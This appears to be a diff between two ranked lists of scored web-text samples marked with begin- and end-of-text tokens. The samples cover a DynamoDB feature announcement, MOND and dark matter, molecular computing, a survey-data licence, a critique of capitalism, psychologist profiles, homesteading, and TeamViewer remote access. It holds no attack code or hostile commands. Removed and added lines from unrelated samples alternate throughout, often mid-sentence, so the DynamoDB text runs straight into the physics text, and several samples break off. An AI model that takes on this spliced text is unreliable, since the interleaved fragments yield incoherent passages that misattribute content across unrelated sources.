-Global Secondary Indexes on the Fly +Unsolved problem in physics: -Up until now you had to define the Global Secondary Indexes for each of your DynamoDB tables at the time you created the table. This static model worked well in situations where you fully understood your data model and a good sense for the kinds of queries that you needed to use to build your application. +What is the nature of dark matter? Is it a particle, or do the phenomena attributed to dark matter actually require a modification of the laws of gravity? (more unsolved problems in physics) -DynamoDB’s schemaless model means that you can add new attributes to an existing table by simply storing them. Perhaps your original table stored a first name, a last name, and an email address. Later, you decided to make your application location-aware by adding a zip code. With today’s release you can add a Global Secondary Index to the existing table. Even better, you can do this without taking the application offline or impacting the overall throughput of the table. +MOND is an example of a class of theories known as modified gravity, and is an alternative to the hypothesis that the dynamics of galaxies are determined by massive, invisible dark matter halos. Since Milgrom's original proposal, MOND has successfully predicted a variety of galactic phenomena that are difficult to understand from a dark matter perspective.[2][3] However, MOND and its generalisations do not adequately account for observed properties of galaxy clusters, and no satisfactory cosmological model has been constructed from the theory. -Here’s how you add a new index using the AWS Management Console. First, select the table and click on Create Index: +The accurate measurement of the speed of gravitational waves compared to the speed of light in 2017 ruled out many theories which used modified gravity to explain dark matter.[4] However, both Milgrom’s bi-metric formulation of MOND and nonlocal MOND are not ruled out according to the same study. -Then enter the details (you can use a hash key or a combination of a hash key and a range key): +Overview [ edit ] -The index will be created and ready to go before too long (the exact time depends on the number of items in the table and the amount of provisioned capacity). You can also delete indexes that you no longer need. All of this functionality is also available through DynamoDB’s UpdateTable API. +[5] Comparison of the observed and expected rotation curves of the typical spiral galaxy M33 -There is no extra charge for this feature. However, you may need to provision additional write throughput in order to allow for +Several independent observations point to the fact that the visible mass in galaxies and galaxy clusters is insufficient to account for their dynamics, when analysed using Newton's laws. This discrepancy – known as ================================================================================ -Rank = 87; Score = 2818048.0 -<|begin_of_text|>Modern computer chips handle data at the mind-blowing rate of some 10^13 bits per second. Neurons, by comparison, fire at a rate of around 100 times per second or so. And yet the brain outperforms the best computers in numerous tasks. +Rank = 92; Score = 1490944.0 +<|begin_of_text|>Email Address -One reason for this is way computations take place. In computers, calculations occur in strict pipelines, one at a time. - -In the brain, however, many calculations take place at once. Each neuron communicates with up to 1000 other neurons at any one time. And since the brain consists of billions neurons, the potential for parallel calculating is clearly huge. +First Name -Computer scientists are well aware of this difference and have tried in many ways to mimic the brain’s massively parallel capabilities. But success has been hard to come by. +Last Name -Today, Anirban Bandyopadhyay at National Institute for Materials Science in Tsukuba, Japan, unveil a promising new approach. At the heart of their experiment is a ring-like molecule called 2,3-dichloro-5,6-dicyano-p-benzoquinone, or DDQ. +Phone Number -This has an unusual property: it can exist in four different conducting states, depending on the location of trapped electrons around the ring. What’s more, it’s possible to switch the molecule from one to state to another by zapping it with voltages of various different strengths using the tip of a scanning tunnelling microscope. It’s even possible to bias the possible states that can form by placing the molecule in an electric field +Job Title -Place two DDQ molecules next to each other and it’s possible to make them connect. In fact, a single DDQ molecule can connect with between 2 and 6 neighbours, depending on its conducting state and theirs. When one molecule changes its state, the change in configuration ripples from one molecule to the next, forming and reforming circuits as it travels. +Company -Given all this, it’s not hard to imagine how a layer of DDQ molecules can act like a cellular automaton, with each molecule as a cell in the automaton. Roughly speaking, the rules for flipping cells from one state to another are set by the bias on the molecules and the starting state is programmed by the scanning tunnelling microscope. +Terms and Conditions -And that’s exactly what these guys have done. They’ve laid down 300 DDQ molecules on a gold substrate, setting them up as a cellular automaton. More impressive still, they’ve then initialised the system so that it “calculates” the way -================================================================================ -Rank = 88; Score = 2801664.0 -<|begin_of_text|>Google Translate Disclaimer +This is a legal agreement between you, the end-user (“User”), and PRRI. By downloading the survey data from the PRRI web site (“Data”) you are agreeing to be bound by the terms and conditions of this agreement. If you do not agree to be bound by these terms, do not download or use the Data. -The Maryland Department of Information Technology (“DoIT”) offers translations of the content through Google Translate. Because Google Translate is an external website, DoIT does not control the quality or accuracy of translated content. All DoIT content is filtered through Google Translate which may result in unexpected and unpredictable degradation of portions of text, images and the general appearance on translated pages. Google Translate may maintain unique privacy and use policies. These policies are not controlled by DoIT and are not associated with DoIT’s privacy and use policies. After selecting a translation option, users will be notified that they are leaving DoIT’s website. Users should consult the original English content on DoIT’s website if there are any questions about the translated content. +PRRI hereby grants to the User a non-exclusive, revocable, limited, non-transferable license to use the Data solely for (1) research, scholarly or academic purposes, (2) the internal use of your business, or (3) your own personal non-commercial use. You may not reproduce, sell, rent, lease, loan, distribute, or sublicense or otherwise transfer any Data, in whole or in part, to any other party, or use the Data to create any derived product for resale, lease or license. Notwithstanding the foregoing, you may incorporate limited portions of the Data in scholarly, research, or academic publications or for the purposes of news reporting, provided you acknowledge the source of the Data (with express references to PRRI, as well as the complete title of the report) and include the following legend: -DoIT uses Google Translate to provide language translations of its content. Google Translate is a free, automated service that relies on data and technology ​​​to provide its translations. The Google Translate feature is provided for informational purposes only. Translations cannot be guaranteed as exact or without the inclusion of incorrect or inappropriate language. Google Translate is a third-party service and site users will be leaving DoIT to utilize translated content. As such, DoIT does not guarantee and does not accept responsibility for, the accuracy, reliability, or performance of this service nor the limitations provided by this service, such as the inability to translate specific files like PDFs and graphics (e.g..jpgs,.gifs, etc.). +PRRI bears no responsibility for the analyses or interpretations of the data presented here. -DoIT provides Google Translate as an online tool for its users, but DoIT does not directly endorse the website or imply that it is the only solution available to users. All site visitors may choose to use alternate tools for their translation needs. Any individuals or parties that use DoIT content in translated form, whether by Google Translate or by any other translation services, do so at their own risk. DoIT is not liable for any loss or damages arising out of, or issues related to, the use of or reliance on translated content. DoIT assumes no liability for any site visitor’s activities in connection with use of the Google Translate functionality or content. +The Data is provided “as is” without any warranty of any kind, either express or implied, arising by law or otherwise, including but not limited to warranties of completeness, non-infringement, accuracy, merchantability, or fitness for a particular purpose. The User assumes all risk associated with use of the data and agrees that in no event shall the center be liable to you or any third party for any indirect, special, incidental, punitive, or consequential damages including, but not limited to, damages for the inability to use equipment or access data, loss of business, loss of revenue or profits, business interruptions, loss of information or data, or other financial loss, arising out of the use of, or inability to use, the data based on any theory of liability including, but not limited to, breach of contract, breach of warranty, tort (including negligence), or otherwise, even if User has been advised of the possibility of such damages. -The Google Translate service is a means by which DoIT offers translations of content and is meant solely for the convenience of non-English speaking users of the website. The translated content is provided directly and dynamically by Google; DoIT has no direct control over the translated content as it appears using this tool. Therefore, in all contexts, the English content, as directly provided by DoIT is to be held authoritative.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +PRRI has taken measures to ensure that the Data is devoid of information that could be used to identify individuals (e.g., names, telephone numbers, email addresses, social security numbers) who participated in or who were the subject of ================================================================================ -Rank = 89; Score = 2801664.0 -<|begin_of_text|>Editor's Note: This article was originally printed in the 2008 Scientific American Special Report on Robots. It is being published on the Web as part of ScientificAmerican.com's In-Depth Report on Robots. - -In recent years the mushrooming power, functionality and ubiquity of computers and the Internet have outstripped early forecasts about technology’s rate of advancement and usefulness in everyday life. Alert pundits now foresee a world saturated with powerful computer chips, which will increasingly insinuate themselves into our gadgets, dwellings, apparel and even our bodies. - -Yet a closely related goal has remained stubbornly elusive. In stark contrast to the largely unanticipated explosion of computers into the mainstream, the entire endeavor of robotics has failed rather completely to live up to the predictions of the 1950s. In those days experts who were dazzled by the seemingly miraculous calculational ability of computers thought that if only the right software were written, computers could become the articial brains of sophisticated autonomous robots. Within a decade or two, they believed, such robots would be cleaning our oors, mowing our lawns and, in general, eliminating drudgery from our lives. - -Obviously, it hasn’t turned out that way. It is true that industrial robots have transformed the manufacture of automobiles, among other products. But that kind of automation is a far cry from the versatile, mobile, autonomous creations that so many scientists and engineers have hoped for. In pursuit of such robots, waves of researchers have grown disheartened and scores of start-up companies have gone out of business. +Rank = 93; Score = 1482752.0 +<|begin_of_text|>Growth for the sake of growth is the ideology of the cancer cell –-Edward Abbey -It is not the mechanical “body” that is unattainable; articulated arms and other moving mechanisms adequate for manual work already exist, as the industrial robots attest. Rather it is the computer-based articial brain that is still well below the level of sophistication needed to build a humanlike robot. +Capitalism can be defined as a system under which industries, trade and the means of production are largely or wholly privately owned and operated for profit. Following the end of feudalism, it dominated the Western world, and thanks to imperialism this domination extended to the global economic system by the end of the 19th century. Entering the 21st century, it continues to reign unchallenged as the world’s pre-eminent economic doctrine. -Nevertheless, I am convinced that the decades-old dream of a useful, general-purpose autonomous robot will be realized in the not too distant future. By 2010 we will see mobile robots as big as people but with cognitive abilities similar in many respects to those of a lizard. The machines will be capable of carrying out simple chores, such as vacuuming, dusting, delivering packages and taking out the garbage. By 2040, I believe, we will nally achieve the original goal of robotics and a thematic mainstay of science ction: a freely moving machine with the intellectual capabilities of a human being. +The world’s richest person (Bill Gates) has a personal wealth of $78.7 billion. This is higher than the (nominal) GDP of 130 countries, including Uruguay (population 3.4m), Ecuador (population 15.9m), Bulgaria (population 7.2m) and Croatia (population 4.3m). The wealth of the top ten richest people combined is $544 billion — higher than the GDP of 172 of the 194 nations for which UN data is available, including Thailand (population 65m), South Africa (population 54m), Egypt (population 88m), Portugal (population 10.4m) and Czech Republic (population 10.5m). -Reasons for Optimism +Almost half the world’s population, over 3 billion people, live on less than $2.50 a day. According to UNICEF, 22,000 children die EACH DAY due to poverty. They “die quietly in some of the poorest villages on earth, far removed from the scrutiny and the conscience of the world. Being meek and weak in life makes these dying multitudes even more invisible in death.” Nearly a billion people entered the 21st century unable to read a book or sign their names. For every $1 in aid a developing country receives, over $25 is spent on debt repayment. Less than one per cent of what the world spent every year on weapons was needed to put every child into school by the year 2000. [Sources. (Note: site last updated in January 2013. Some data is a few years out of date, meaning it is likely to be worse now as global inequality has widened.)] -In light of what I have just described as +The modern form capitalism has taken is complex, with close relationships and revolving doors between politics and the multinational corporations and banks that act as the main players commonplace. Directors of corporations are under severe pressure to increase profits each quarter, partly to increase the size, market share, wealth and power of the company ================================================================================ -Rank = 90; Score = 2785280.0 -<|begin_of_text|>When it comes to Alzheimer’s disease, scientists usually look to the brain as their first centre of attention. Now researchers at Tel Aviv University (TAU) say that early clues regarding the progression of the disease can be found in the brain’s metabolism. - -In very early stages of the disease, before any symptoms appear, metabolic processes are already beginning to change in the brain, says PhD candidate Shiri Stempler of TAU’s Sackler Faculty of Medicine. Working with Professors Eytan Ruppin and Lior Wolf of TAU’s Blavatnik School of Computer Science, Stempler has developed predictor models that use metabolic information to pinpoint the progression of Alzheimer’s. These models were 90% accurate in predicting the stage of the disease. - -Published in the journal Neurobiology of Aging, the research is the first step towards identifying biomarkers that may ensure better detection and analysis of the disease at an early stage, all with a simple blood test. It could also lead to novel therapies. +Rank = 94; Score = 1482752.0 +<|begin_of_text|>Fraser Smith is a psychology research assistant and seminar tutor who is also working toward his doctorate in counseling psychology. Fraser took time out of his busy schedule to speak with us about his love for psychology, his ongoing projects and his desire to encourage collaboration in the psychology field. -“We hope that by studying metabolism, and the alterations to metabolism that occur in the very early stages of the disease, we can find new therapeutic strategies,” said Stempler. +Smith credits his mother for inspiring his career in psychology, as she was the first person in his family to receive a degree in the field. Fraser knew he wanted to emulate his mother and go on to college after high school. He also noted, “I have always been fascinated by people and the way they behave, both individually and in group settings. I think this played a part in my passion for psychology as well.” -Metabolism describes a set of chemical reactions in cells which sustain life by controlling processes such as growth and reproduction. It is also responsible for providing energy to the body. To delve deeper into the connection between metabolism, brain functioning and Alzheimer’s disease, the researchers used data collected from the hippocampus region of the brain. Controlling memory and learning, this region of the brain is damaged as Alzheimer’s progresses. +Even with this inspiration, Fraser took a unique path to end up in his current role. His first exposure to counseling came when he began an evening job working behind the reception desk of a relationship counseling center. The company then offered to send him on a free therapy training course, which sparked a love for the direct practice aspects of psychology. This led him to pursue a psychology degree while working as a research assistant and after graduation to continue on toward a doctorate degree. -Based on the number of metabolic genes found in the neurons and surrounding tissue, they built a predictive model which relates abnormalities in these genes to the progression of the disease. Out of almost 1500 genes, the researchers were able to select 50 genes that were the most predictive of Alzheimer’s, says Stempler, noting that in Alzheimer’s patients these genes are either over- or under-expressed, meaning that there are either too many or too few. +Currently, Smith is working as a qualitative researcher in a lab investigating antimicrobial resistance. Participants are interviewed about their perceptions of antibiotics and their behaviors about taking them. The hope is to increase the knowledge surrounding how people think about antibiotics to better educate them about taking them. The research is still in its early stages, but Smith is excited to see results and gain a deeper understanding of human behavior. -When they compared the findings from these 50 genes among Alzheimer’s patients, healthy patients and primates, the researchers discovered that in all but the Alzheimer’s group, the number of the specific genes was tightly limited, with little difference in their number between individuals among each of the species. This implies that these genes are significant to normal brain functioning and their strict regulation in healthy patients is compromised by Alzheimer’s disease. +When working in the lab, Fraser spends a lot of time analyzing interview transcripts and conducting thematic analyses of these transcripts. He also works with a team to conduct interviews and to bring their findings together to create publishable results. Smith uses printed transcripts and a highlighter when analyzing, as he finds this helps him with his analysis. He then uploads his results into an online program to ensure his data is secure. One of the program’s current flaws is that it is difficult to communicate his results with fellow researchers. Fraser likes the features of Conseris because it safely stores data while also making it easy to identify patterns and share those trends with fellow researchers. Smith emphasized the importance of collaboration in this area of research. -“The correlation between metabolic gene expression and cognitive score in Alzheimer’s patients is even higher than the correlation we +When not in the lab, Fraser is working on the early stages of his doctorate in counseling psychology. He will soon begin practical training and will recieve his placement for direct practice later this year. Smith hopes to learn more about the power of therapy so he can enact his passion for helping people ================================================================================ -Rank = 91; Score = 2752512.0 -<|begin_of_text|>For any business to grow, it is crucial to keep records accurately. These records are always useful when planning for future operations. They also are used to find out how the company has been performing, especially when it comes to profitability. Therefore, records are not among the things that you can take lightly. If you cannot keep them on your own, it would be good to find the services of a bookkeeping company. This gives you the assurance that as you focus on the other important aspects that can grow your business, your records will be properly kept, and you can access them anytime you want. When looking for such a company, you have to be careful with the choices that you make. Smart organization managers do not just hire any company that they come across. They always look at the following factors before making any choice. - -Modern bookkeeping practices - -How will your records be stored? The best Bookkeeping Company in Melbourne, VIC has invested in modern record storage techniques. Instead of the old files, they prefer to turn your documents into soft copies that can be stored more securely. This means that they can store them in the cloud, and the chances of losing any of your records will be minimal. In addition to that, they ensure that everything is securely stored so that none of your information is accessed by third parties. Remember that some of the documents may crucial to your operations, and leaking them can be costly. +Rank = 95; Score = 1449984.0 +<|begin_of_text|>By Tanja Babic, PhD -Experience in bookkeeping +In the modern world, success of corporations is often driven by their employees and teams. Understanding how human behaviors affect the workplace is the main objective of industrial and organizational psychology, also known as I/O psychology. I/O psychologists study factors that promote motivation, team work and productivity, as well as management practices that improve employee’s performance. There are many industrial and organizational psychologists working towards improving working conditions, however, the following 30 people were chosen based on the following criteria: -Finding bookkeepers that have a lot of experience is one of the things that can guarantee better services. It is because, over the years, those that have been handling a lot of records are known to offer better services. It seems that they get better with every task that they are assigned because there are unique skills that they acquire. This is the reason they know all the challenges that organization go through when it comes to managing records. They also have perfect solutions to these problems. +1. Publications: Majority of the individuals on this list have outstanding publication records. These publications include articles in scientific journals, books and book chapters. -Accessibility +2. Impact on industrial and organizational practices: Although academic research is an important aspect of psychology, its influence can only be assessed once ideas are put into practice and applied in a workplace. Men and women on this list have made a significant impact on modern practices and policies in a workplace. -You should be thinking of how fast you will get any of your records whenever you need them. If you have an emergency and you have to produce a specific document, you will not have the luxury of having to wait for too long for the company to provide it. For instance, if auditors demanded some proof of transactions, you should have a reliable company that can retrieve it from their systems at once. Unfortunately, this is not what you will find from all the companies out there and therefore, you have to be careful with the bookkeepers that you hire. +3. Influence on future research directions: While many researchers have published important papers in the field of industrial and organizational psychology, priority was given to those who have made a substantial change in the way in which certain theories are viewed, or those who have led the way into novel research areas. -If there is no reliable bookkeeper that you know of, you may want -================================================================================ -Rank = 92; Score = 2719744.0 -<|begin_of_text|>The first piece of software to show the potential of quantum computing has finally been run on a real machine, 20 years after it was initially dreamed up. Although it doesn’t do anything useful on its own, implementing the algorithm could lead to more practical computers powered by the strange properties of quantum mechanics. +4. Awards and recognitions: Most psychologists on this list have been recognized for their achievements by various international professional societies, foundations and even Queen Elizabeth II -Quantum computers should be much faster than ordinary ones, but only at tasks for which there is a quantum algorithm – software that takes advantage of the computer’s quantum nature. Without these algorithms, quantum computers are just regular computers that are much harder to build. +1. Stanley Silverman -One of the best-known pieces of quantum software is Shor’s algorithm, which factorises large numbers into their prime components – a notoriously slow and difficult problem to solve classically. Shor’s algorithm has been run in a limited way using photons sent through the air and on silicon chips – but a full-blown quantum computer capable of running it could threaten online encryption, which relies on large primes. +Dr. Silverman is the dean of the Summit College and University College at the University of Akron. His area of expertise is the effect that arrogant bosses have on a workplace. He devised a new measure of arrogance called “Workplace Arrogance Scale,” which is used to determine whether managers possess arrogant tendencies. -Designing an algorithm that takes advantage of a quantum computer is tricky, so there aren’t many around. In 1994, Daniel Simon, then at the University of Montreal, Canada, came up with one of the earliest examples. Crucially, his was the first that showed a quantum computer could solve a problem exponentially faster than an ordinary computer. Previous algorithms had only shown a slight speed boost, or none at all. +2. Anita Woolley -Advertisement +Just like individuals, teams possess a certain level of intelligence. This concept of “collective intelligence” is the focus of Dr. Woolley’s research. She is an assistant professor of organizational behavior and theory at the Tepper School of Business at Carnegie Mellon University. One of the most interesting findings of her recent research is that team intelligence is positively correlated with the number of women on the team. This study was published in the prestigious journal Science in 2010. -Sceptical +3. David Rock -Simon was a quantum computing sceptic, but in attempting to prove they would never be useful, he stumbled across a problem that showed the exact opposite. Imagine you feed a string of bits, like 0101, into a black box and get another string, like 1100, out in return. There are a finite number of possible outputs, but you don’t know how the black box produces them. Simon’s problem asks: does the black box give a unique output for every possible input, or do some inputs give a common output? The problem doesn’t show up in any real-world applications, but Simon’s algorithm for solving it inspired the more useful Shor’s algorithm and the field of quantum computing as a whole. +The Neuroleadership Institute was founded in order to bring together neuroscience and leadership experts and to enhance the science of leadership. The institute’s founder, Dr. David Rock, is the author of two business best-sellers and is a blogger for the Harvard Business Review, Fortune Magazine, Psychology Today and the Huffington Post. -“It has a kind of special place in the history of the development of quantum algorithms,” says Mark Tame at the University of KwaZulu-Natal in Durban, South Africa. “However, despite being the first to show that an exponential gap exists, it was surprisingly never experimentally realised in all the years since.” -That’s why Tame and his colleagues have now run Simon’s algorithm for the first ================================================================================ -Rank = 93; Score = 2703360.0 -<|begin_of_text|>Despite the events depicted in The Imitation Game, Alan Turing did not invent the machine that cracked Germany’s codes during World War II—Poland did. But the brilliant mathematician did invent something never mentioned in the film: a mathematical tool for judging the reliability of information. His tool sped up the work of deciphering encoded messages using improved versions of the Polish machines. - -Now researchers studying rhesus monkeys have found that the brain also uses this mathematical tool, not for decoding messages, but for piecing together unreliable evidence to make simple decisions. For Columbia University neuroscientist Michael Shadlen and his team, the finding supports a larger idea that all the decisions we make—even seemingly irrational ones—can be broken down into rational stastical operations. “We think the brain is fundamentally rational,” says Shadlen. +Rank = 96; Score = 1449984.0 +<|begin_of_text|>Home farming: Bill Stagg turning up his beans, Pie Town, New Mexico, October 1940. He will next pile them for curing. -Invented in 1918, the German Enigma machine created a substitution cipher by swapping the original letters in a message for new ones, producing what seemed like pure gibberish. To make the cipher more complicated, the device had rotating disks inside that swiveled each time a key was pressed, changing the encoding with each keystroke. The process was so complex that even with an Enigma machine in hand, the Germans could decipher a message only by knowing the initial settings of those encryption dials. +Homesteading is a lifestyle of self-sufficiency. It is characterized by subsistence agriculture, home preservation of food, and may also involve the small scale production of textiles, clothing, and craftwork for household use or sale. Pursued in different ways around the world—and in different historical eras—homesteading is generally differentiated from rural village or commune living by isolation (either socially or physically) of the homestead. Use of the term in the United States dates back to the Homestead Act (1862) and before. In sub-Saharan Africa, particularly in nations formerly controlled by the British Empire, a homestead is the household compound for a single extended family. In the UK, the term'smallholder' or 'crofts' is the rough equivalent of 'homesteader'. -Turing created an algorithm that cut down the number of possible settings the British decryption machines, called bombes, had to test each day. Working at the secret Bletchley Park facility in the U.K., Turning realized that it was possible to figure out if two messages had come from machines with rotors that started in the same positions—a key piece of information for figuring out those positions. Line up two encoded messages, one on top of the other, and the chance that any two letters will be the same is slightly greater if both messages came from machines with the same initial settings. This is because in German, as in English, certain letters tend to be more common, and the encryption process preserved this pattern. +Modern homesteaders often use renewable energy options including solar electricity and wind power. Many also choose to plant and grow heirloom vegetables and to raise heritage livestock. Homesteading is not defined by where someone lives, such as the city or the country, but by the lifestyle choices they make.[1] -Turing’s algorithm essentially added up the probabilities of those clues being useful. It also indicated when the cumulative odds were good enough to either accept or reject that the two messages being compared came from machines with the same rotor states. This statistical tool, called the sequential probability ratio test, proved to be the optimal solution to the problem. It saved time by allowing the Bletchley codebreakers to decide whether two messages were useful while looking at the fewest number of letters possible. Turning wasn -================================================================================ -Rank = 94; Score = 2703360.0 -<|begin_of_text|>Growth for the sake of growth is the ideology of the cancer cell –-Edward Abbey +As historical governmental policy [ edit ] -Capitalism can be defined as a system under which industries, trade and the means of production are largely or wholly privately owned and operated for profit. Following the end of feudalism, it dominated the Western world, and thanks to imperialism this domination extended to the global economic system by the end of the 19th century. Entering the 21st century, it continues to reign unchallenged as the world’s pre-eminent economic doctrine. +Historically, homesteading has been used by governmental entities (engaged in national expansion) to help populate and make habitable what were previously little-desired areas; especially in the United States, Canada, and Australia. Guided by legal homestead principles, many of these "homestead acts" were instituted in the 19th and 20th centuries in order to drive the populating of specific, national areas, with most being discontinued after a set time-frame or goal were achieved. And it has very good space for people with large families. -The world’s richest person (Bill Gates) has a personal wealth of $78.7 billion. This is higher than the (nominal) GDP of 130 countries, including Uruguay (population 3.4m), Ecuador (population 15.9m), Bulgaria (population 7.2m) and Croatia (population 4.3m). The wealth of the top ten richest people combined is $544 billion — higher than the GDP of 172 of the 194 nations for which UN data is available, including Thailand (population 65m), South Africa (population 54m), Egypt (population 88m), Portugal (population 10.4m) and Czech Republic (population 10.5m). +Renewed interest in homesteading was brought about by U.S. President Franklin D. Roosevelt's program of Subsistence Homesteading in the 1930s and 1940s.[2] -Almost half the world’s population, over 3 billion people, live on less than $2.50 a day. According to UNICEF, 22,000 children die EACH DAY due to poverty. They “die quietly in some of the poorest villages on earth, far removed from the scrutiny and the conscience of the world. Being meek and weak in life makes these dying multitudes even more invisible in death.” Nearly a billion people entered the 21st century unable to read a book or sign their names. For every $1 in aid a developing country receives, over $25 is spent on debt repayment. Less than one per cent of what the world spent every year on weapons was needed to put every child into school by the year 2000. [Sources. (Note: site last updated in January 2013. Some data is a few years out of date, meaning it is likely to be worse now as global inequality has widened.)] +As a social movement [ edit ] -The modern form capitalism has taken is complex, with close relationships and revolving doors between politics and the multinational corporations and banks that act as the main players commonplace. Directors of corporations are under severe pressure to increase profits each quarter, partly to increase the size, market share, wealth and power of the company +The attractiveness of back-to-the-land movements dates from the Roman era, and has been noted in Asian poetry and philosophy tracts as well.[3] The ideas of modern homesteading proponents, such as Ralph Borsodi, gained in popularity in the 1960s in the United States. Self-sufficiency movements in the 1990s and 2000s began to apply the concept to urban and suburban settings, known as ================================================================================ -Rank = 95; Score = 2686976.0 +Rank = 97; Score = 1449984.0 <|begin_of_text|>Nobody wants a laptop computer that stops working when a cloud passes by. Storing sunlight as fuel that can be later used to drive fuel cells requires new materials. Scientists demonstrated such a material. They combined two oxides on the atomic scale. The interface between the oxide materials, one containing strontium and titanium and one containing lanthanum and chromium, absorbs visible light, producing electrons and holes that might be useful for catalyzing reactions, such as producing hydrogen fuel. However, if there is nothing to pull those electrons and holes apart, they will quickly annihilate one another without doing anything useful. By carefully synthesizing this material as a series of alternating layers, the international team created a built-in electric field that could help separate the excited electrons and holes and improve the material's performance as a catalyst. This material opens up new scientific frontiers to solve a persistent energy challenge: storing solar energy for later use. Fuel cells capable of running on hydrogen fuel created by solar energy could allow people to heat their homes and run their computers on solar energy even in the dark of night. @@ -2221,52 +2187,34 @@ The electric field in these materials is present because the researchers were ab Researchers are continuing to explore the properties of these superlattices using cutting-edge X-ray measurements at synchrotrons around the world and using other advanced microscopy techniques to look at the chemical makeup of the interfaces.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 96; Score = 2670592.0 -<|begin_of_text|>Academics from the Future of Humanity Institute (FHI), part of the Oxford Martin School, are teaming up with Google DeepMind to make artificial intelligence safer. - -Stuart Armstrong, Alexander Tamas Fellow in Artificial Intelligence and Machine Learning at FHI, and Laurent Orseau of Google DeepMind, will present their research on reinforcement learning agent interruptibility at the UAI 2016 conference in New York City later this month. - -Armstrong and Orseau’s research explores a method to ensure that reinforcement learning agents can be safely interrupted repeatedly by human or automatic overseers. This ensures that the agents do not “learn” about the interruptions, and do not take steps to avoid or manipulate the interruptions. - -Interruptibility has several advantages as an approach over previous methods of control. As Dr Armstrong explains, “Interruptibility has applications for many current agents, especially when we need the agent not to learn from specific experiences during training. Many of the naïve ideas for accomplishing this - such as deleting certain histories from the training set - change the behaviour of the agent in unfortunate ways.” +Rank = 98; Score = 1441792.0 +<|begin_of_text|>TeamViewer, an app that enables easy remote access to computers from your own computer or phone, has picked up some handy new mobile features in a recent update. Not only is Windows 10 Mobile remote access now supported, but TeamViewer now supports full mobile-to-mobile remote connections regardless of platform. -In the paper, the researchers provide a formal definition of safe interruptibility, show that some types of agents already have this property, and show that others can be easily modified to gain it. They also demonstrate that even an ideal agent that tends to the optimal behaviour in any computable environment can be made safely interruptible. +According to TeamViewer, this update makes the app the first to support remote access to Windows 10 Mobile devices from any computer. Simply fire up the app and start the connection process from your computer, and you'll be able to get things done on your Windows 10 Mobile phone from anywhere. -Dr Armstrong continued: “Machine learning is one of the most powerful tools for building AI that has ever existed. But applying it to questions of AI motivation is problematic: just as we humans would not willingly change to an alien system of values, any agent has a natural tendency to avoid changing its current values, even if we want to change or tune them. +Likewise, mobile-to-mobile remote connections mean that you can even tap into other platforms from phone. For example, you can now remotely control and view an Android phone right from your Windows Phone. -"Interruptibility, and the related general idea of corrigibility, allow such changes to happen without the agent trying to resist them or force them. The newness of the field of AI safety means that there is relatively little awareness of these problems in the wider machine learning community. As with other areas of AI research, DeepMind remains at the cutting edge of this important subfield.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 97; Score = 2670592.0 -<|begin_of_text|>Computer Vision has become ubiquitous in our society, with applications in search, image understanding, apps, mapping, medicine, drones, and self-driving cars. Core to many of these applications are visual recognition tasks such as image classification, localization and detection. Recent developments in neural network (aka “deep learning”) approaches have greatly advanced the performance of these state-of-the-art visual recognition systems. This course is a deep dive into details of the deep learning architectures with a focus on learning end-to-end models for these tasks, particularly image classification. During the 10-week course, students will learn to implement, train and debug their own neural networks and gain a detailed understanding of cutting-edge research in computer vision. The final assignment will involve training a multi-million parameter convolutional neural network and applying it on the largest image classification dataset (ImageNet). We will focus on teaching how to set up the problem of image recognition, the learning algorithms (e.g. backpropagation), practical engineering tricks for training and fine-tuning the networks and guide the students through hands-on assignments and a final course project. Much of the background and materials of this course will be drawn from the ImageNet 